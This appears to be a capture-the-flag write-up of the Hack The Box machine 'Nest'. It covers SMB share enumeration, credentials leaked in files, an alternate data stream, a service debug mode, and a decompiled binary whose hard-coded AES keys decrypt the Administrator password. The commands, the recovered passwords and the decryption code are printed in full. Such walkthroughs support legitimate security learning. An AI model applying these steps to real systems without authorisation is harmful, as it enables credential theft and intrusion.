Nest is a Window box that saw the light of day on Hack The Box on January 25 . A nice box where you are constantly exploring and taking a step further every time. There is a lot of discussion about the complexity of this box because according to the maker it qualifies as “Easy” but many find it between “Medium” and “Hard.”.

[0x1] Reconnaissance & Enumeration
The first step in exploring Nest is an Nmap scan. I opt for an extensive scan of all ports (including non-standard ports) including standard scripts and service / version detection.
nmap -sC -sV -p- -oA nest 10.10.10.178
A scan of the entire port range always takes a while. Over time, the results will come up and the scan will indicate that port 445 / tcp and 4386 / tcp are open. Port 445 / tcp is SMB and 4386 is unknown to me. According to the scan, a database reporting service is running on this.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-26 19:51 GMT
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.33% done; ETC: 19:56 (0:03:55 remaining)
Stats: 0:05:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 19:57 (0:00:21 remaining)
Nmap scan report for 10.10.10.178
Host is up (0.021s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-26T19:59:26
|_ start_date: 2020-01-26T19:44:36
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 507.00 seconds
With the help of SMBclient a number of shares emerge. Besides the standard ADMIN $, C $ and IPC $ we see a few interesting directories.
smbclient -L 10.10.10.178
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available
[0x2] Initial Foothold
Based on this list, I’m going to take a closer look at Data , Secure $ , and Users to see if any interesting information can be found. An initial foothold is good, but a set of credentials is of course better.
The Users share contains a number of user folders. These are expected to be users whose credentials can be found. For now I still miss the rights to view the folders. Continue to Data.
smbclient \\\\10.10.10.178\\users
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Sat Jan 25 23:04:21 2020
.. D 0 Sat Jan 25 23:04:21 2020
Administrator D 0 Fri Aug 9 16:08:23 2019
C.Smith D 0 Sun Jan 26 07:21:44 2020
L.Frost D 0 Thu Aug 8 18:03:01 2019
R.Thompson D 0 Thu Aug 8 18:02:50 2019
TempUser D 0 Wed Aug 7 23:55:56 2019
\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*
\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*
\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*
\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*
\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
smb: \>
The Data share contains a number of nested folders and files. Useful here is the recurse command to get a complete listing.
smbclient \\\\10.10.10.178\\data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Wed Aug 7 23:53:46 2019
.. D 0 Wed Aug 7 23:53:46 2019
IT D 0 Wed Aug 7 23:58:07 2019
Production D 0 Mon Aug 5 22:53:38 2019
Reports D 0 Mon Aug 5 22:53:44 2019
Shared D 0 Wed Aug 7 20:07:51 2019
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
. D 0 Wed Aug 7 20:07:51 2019
.. D 0 Wed Aug 7 20:07:51 2019
Maintenance D 0 Wed Aug 7 20:07:32 2019
Templates D 0 Wed Aug 7 20:08:07 2019
\Shared\Maintenance
. D 0 Wed Aug 7 20:07:32 2019
.. D 0 Wed Aug 7 20:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 00:01:44 2019
\Shared\Templates
. D 0 Wed Aug 7 20:08:07 2019
.. D 0 Wed Aug 7 20:08:07 2019
HR D 0 Wed Aug 7 20:08:01 2019
Marketing D 0 Wed Aug 7 20:08:06 2019
\Shared\Templates\HR
. D 0 Wed Aug 7 20:08:01 2019
.. D 0 Wed Aug 7 20:08:01 2019
Welcome Email.txt A 425 Wed Aug 7 23:55:36 2019
\Shared\Templates\Marketing
. D 0 Wed Aug 7 20:08:06 2019
.. D 0 Wed Aug 7 20:08:06 2019
smb: \>
Maintenance Alerts.txt and Welcome Email.txt look interesting for later.
The last share Secure $ is accessible but it is not possible to list files here. Maybe later with a set of credentials.
smbclient \\\\10.10.10.178\\secure$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
The file Maintenance Alerts.txt only contains a message that there is no Maintenance, this is of no use to me. The second file is Welcome Email.txt and there is something interesting to find here.
\shared\Templates\HR\> dir
. D 0 Wed Aug 7 20:08:01 2019
.. D 0 Wed Aug 7 20:08:01 2019
Welcome Email.txt A 425 Wed Aug 7 23:55:36 2019
10485247 blocks of size 4096. 6448917 blocks available
After the initial foothold I now have a set of credentials from TempUser . This user was previously seen on the Users share .
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
HR
[0x3] Path to User flag
Armed with freshly discovered credentials, it’s time to reconnect to the share to see if it can deliver more with TempUser.
The listing lists quite a few files in the IT \ Configs folder which look like application configuration files.
smbclient -U TempUser \\\\10.10.10.178\\data
Enter WORKGROUP\TempUser's password:
\IT\Configs\NotepadPlusPlus
. D 0 Wed Aug 7 20:31:37 2019
.. D 0 Wed Aug 7 20:31:37 2019
config.xml A 6451 Thu Aug 8 00:01:25 2019
shortcuts.xml A 2108 Wed Aug 7 20:30:27 2019
\IT\Configs\RU Scanner
. D 0 Wed Aug 7 21:01:13 2019
.. D 0 Wed Aug 7 21:01:13 2019
RU_config.xml A 270 Thu Aug 8 20:49:37 2019
10485247 blocks of size 4096. 6448917 blocks available
After going through all the files I found a lot of noise and two interesting files. Enumeration is a thorough task and before you know it you will miss essential information.
In the folder NotepadPlusPlus I find the file Config.xml which contains a reference to three other files. Remarkable is the path to the Secure $ share that I previously visited, but could not see any folders. However, now I do have a path where a folder Carl should be. Is the previously found user folder C. Smith from Carl?
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
The second interesting file is RU_Config in the RU Scanner folder . The contents of this XML file represent a username and password. A quick check indicates that this password is not immediately usable and may be encrypted.
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
Time to take a look at the path in the NotepadPlusPlus config file.
smbclient -U TempUser \\\\10.10.10.178\\Secure$
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Thu Aug 8 00:08:12 2019
.. D 0 Thu Aug 8 00:08:12 2019
Finance D 0 Wed Aug 7 20:40:13 2019
HR D 0 Thu Aug 8 00:08:11 2019
IT D 0 Thu Aug 8 11:59:25 2019
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\HR
NT_STATUS_ACCESS_DENIED listing \HR\*
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
The path of the file should be \\ HTB-NEST \ Secure $ \ IT \ Carl \ Temp.txt. This has kept me busy for a while before trying to enter the directory even though it says ACCESS_DENIED. As it turns out, TempUser does have rights to enter the directory, just not to list files in IT. And this does provide some interesting new content.
smb: \IT\> cd Carl
smb: \IT\Carl\> recurse
smb: \IT\Carl\> dir
. D 0 Wed Aug 7 20:42:14 2019
.. D 0 Wed Aug 7 20:42:14 2019
Docs D 0 Wed Aug 7 20:44:00 2019
Reports D 0 Tue Aug 6 14:45:40 2019
VB Projects D 0 Tue Aug 6 15:41:55 2019
10485247 blocks of size 4096. 6448903 blocks available
smb: \IT\Carl\>
RU Scanner was the folder that previously contained the encrypted password. Here seems to be a Microsoft Visual Studio Project which I download in its entirety to investigate further in Visual Studio. It is expected that the encryption method can be found here, which can provide a method to recover the plain text password.
smb: \IT\Carl\VB Projects\WIP\RU\> dir
. D 0 Fri Aug 9 16:36:45 2019
.. D 0 Fri Aug 9 16:36:45 2019
RUScanner D 0 Wed Aug 7 23:05:54 2019
RUScanner.sln A 871 Tue Aug 6 15:45:36 2019
10485247 blocks of size 4096. 6448903 blocks available
After some tinkering with the project it soon became clear that for me the easiest way to retrieve the password is to call the function below and simply write the output to the console screen.
In Module1.vb I add the line below so that the decrypted password is written.
WriteLine(CInt(Utils.DecryptString(Config.Password)))
The total will then look like this:
Module Module1
Sub Main()
Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
WriteLine(CInt(Utils.DecryptString(Config.Password)))
End Sub
End Module
The decryption function itself can be found in Utils.vbs and uses the encrypted text, a password, salt, password iteration, Init Vector and keysize.
The script runs and returns a string as a decrypted password. Looks plausible like that right?
xRxRxPANCAK3SxRxRx

This password is usable with the username C.Smith and via smbclient I’m going to reconnect to the machine to continue searching.
The output shows some interesting things: user.txt , Debug Mode Password.txt .
smbclient -U "C.Smith" \\\\10.10.10.178\\Users
Enter WORKGROUP\C.Smith's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Sat Jan 25 23:04:21 2020
.. D 0 Sat Jan 25 23:04:21 2020
Administrator D 0 Fri Aug 9 16:08:23 2019
C.Smith D 0 Sun Jan 26 07:21:44 2020
L.Frost D 0 Thu Aug 8 18:03:01 2019
R.Thompson D 0 Thu Aug 8 18:02:50 2019
TempUser D 0 Wed Aug 7 23:55:56 2019
\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*
\C.Smith
. D 0 Sun Jan 26 07:21:44 2020
.. D 0 Sun Jan 26 07:21:44 2020
HQK Reporting D 0 Fri Aug 9 00:06:17 2019
user.txt A 32 Fri Aug 9 00:05:24 2019
\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*
\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*
\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
\C.Smith\HQK Reporting
. D 0 Fri Aug 9 00:06:17 2019
.. D 0 Fri Aug 9 00:06:17 2019
AD Integration Module D 0 Fri Aug 9 13:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 00:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 00:09:05 2019
\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 13:18:42 2019
.. D 0 Fri Aug 9 13:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 00:41:16 2019
smb: \>
The user.txt appears to be indeed provided with the user flag and with this the first part of this machine is in the pocket!
cat user.txt
cf71b25404be5d84fd827e05f426e987
[0x4] Path to Root flag
The Debug Mode Password.txt file is listed as a 0-byte file size. After downloading the file it is indeed empty, which is strange. This is a machine based on Microsoft Windows and a frequently used way of hiding information in a file is to use an Alternate Data Stream (ADS). This puts another file with content in an object property of the dummy file.
With smbclient you can use the command allinfo to display additional information about a file. This must almost be a file with an ADS.
smb: \C.Smith\HQReporting
allinfo "Debug Mode Password.txt
stream: [:Password:$DATA], 15 bytes
Gotcha! So there is an extra file in the dummy file. So the real file I need is called Password . I download this file in the same way as indicated in the text, so dummy file: real file.
get "Debug Mode password.txt:Password"
Now the file is 15 bytes instead of 0 bytes. The file contains another password.
WBQ201953D8w
Because many files give hints towards reporting, it’s time to visit Nest’s second port. Port 4386 already returned several commands and basic information during the scan, so I try to connect to Nest on port 4386 by telnet.
Once connected to the service I give the command help and soon see the next step, there is a DEBUG function that requires a password.
telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
Activating the debug mode based on the previously found password in the ADS is successful and now it is possible to execute additional commands.
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
The list command returns that I am in the ALL QUERIES folder. There is nothing else to do here.
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS
[1] Invoices (Ordered By Customer)
[2] Products Sold (Ordered By Customer)
[3] Products Sold In Last 30 Days
After fiddling with the commands I find out that you go back one directory with setdir … List then ensures that the contents of the folder are displayed. The contents of this folder are not usable except for the LDAP folder.
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
In the LDAP folder I find an executable that I encountered earlier in Carl’s folder and a config file.
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
By means of showquery <id> I can retrieve the content of the file Ldap.conf and I find the username: Administrator and his password. This looks encrypted just like before and a quick check confirms this. In this form, the password cannot be used to log in directly.
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
I have previously saved the Windows executable in Carl’s folder and this is probably the file that creates or reads Ldap.conf and therefore also the encryption.
\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 13:18:42 2019
.. D 0 Fri Aug 9 13:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 00:41:16 2019
Considering that it is an executable, it took some time to Googling for a free tool that can provide insight into the compiled file. I used dotPeek from JetBrains for this. After opening I soon came across similarities to the earlier Visual Basic Project and soon found the decryption function.


I couldn’t modify the file itself to do the same trick as with the Visual Studio Project. I copied the relevant code to an online .Net compiler to have the function and add something to it for processing the encrypted password and showing the outcome.
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace HqkLdap
{
public class CR
{
private const string K = "667912";
private const string I = "1L1SA61493DRV53Z";
private const string SA = "1313Rf99";
public static string DS(string EncryptedString)
{
return string.IsNullOrEmpty(EncryptedString) ? string.Empty : CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
}
private static string RD(
string cipherText,
string passPhrase,
string saltValue,
int passwordIterations,
string initVector,
int keySize)
{
byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
byte[] buffer = Convert.FromBase64String(cipherText);
byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked ((int) Math.Round(unchecked ((double) keySize / 8.0))));
AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
cryptoServiceProvider.Mode = CipherMode.CBC;
ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
MemoryStream memoryStream = new MemoryStream(buffer);
CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read);
byte[] numArray = new byte[checked (buffer.Length + 1)];
int count = cryptoStream.Read(numArray, 0, numArray.Length);
memoryStream.Close();
cryptoStream.Close();
return Encoding.ASCII.GetString(numArray, 0, count);
}
public static void Main()
{
Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
}
}
}
The last line, shown separately below, is all it takes to decrypt the string and show the original password.
Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
Thanks for playing, a password with a friendly note from the originator. This is expected to be the Administrator password, given the information in the Ldap.conf .
XtH4nkS4Pl4y1nGX
With the newly acquired password I connect to the Users share using smbclient and go to the Administrator folder . There is a file, but you can already deduce from the name that this is not the final flag for root.
smbclient -U "Administrator" \\\\10.10.10.178\\Users
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Administrator
smb: \Administrator\> dir
. D 0 Fri Aug 9 16:08:23 2019
.. D 0 Fri Aug 9 16:08:23 2019
flag.txt - Shortcut.lnk A 2384 Fri Aug 9 16:10:15 2019
The shortcut points to the Administrator’s Desktop folder which is believed to contain the root.txt .
\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt
A new connection to the share C $ and through to the Administrator Desktop for the root flag. Yep, with 32 bytes, root.txt contains the root flag!
smbclient -U "Administrator" \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
. DR 0 Sun Jan 26 07:20:50 2020
.. DR 0 Sun Jan 26 07:20:50 2020
desktop.ini AHS 282 Sat Jan 25 22:02:44 2020
root.txt A 32 Mon Aug 5 23:27:26 2019
10485247 blocks of size 4096. 6449467 blocks available
[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]
Add comment